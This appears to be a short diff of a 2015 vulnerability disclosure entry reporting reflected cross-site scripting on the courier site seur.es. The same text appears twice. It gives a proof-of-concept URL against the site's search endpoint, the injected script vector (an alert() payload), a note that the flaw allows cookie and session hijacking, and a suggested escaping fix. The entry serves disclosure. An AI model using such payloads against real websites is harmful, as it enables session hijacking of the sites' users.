MiguelBel · August 29, 2015 14:07
diff --git a/Seur.es b/Seur.es
 Bypass Google Chrome Auditor: No
 
 Web: http://www.seur.es
 
 Vulnerability: Reflected XSS
 
 PoC (Proof of concept): http://www.seur.com/buscador.do?txtPalabra=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28%22xss%22%29;%3C/script%3E%3Cdiv%20id=%22mi
 
 Attack Vector: "></iframe><script>alert("xss");</script><div id="mi
 
 Description: Allows to the user to execute custom javascript code that is used to hijack cookies and sessions.Can be very harmful for someone who have bad intention. 
 
 Solution: Escape the special chars '';!--"<XSS>=&{()}
	Bypass Google Chrome Auditor: No

	Web: http://www.seur.es

	Vulnerability: Reflected XSS

	PoC (Proof of concept): http://www.seur.com/buscador.do?txtPalabra=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28%22xss%22%29;%3C/script%3E%3Cdiv%20id=%22mi

	Attack Vector: "></iframe><script>alert("xss");</script><div id="mi

	Description: Allows to the user to execute custom javascript code that is used to hijack cookies and sessions.Can be very harmful for someone who have bad intention.

	Solution: Escape the special chars '';!--"<XSS>=&{()}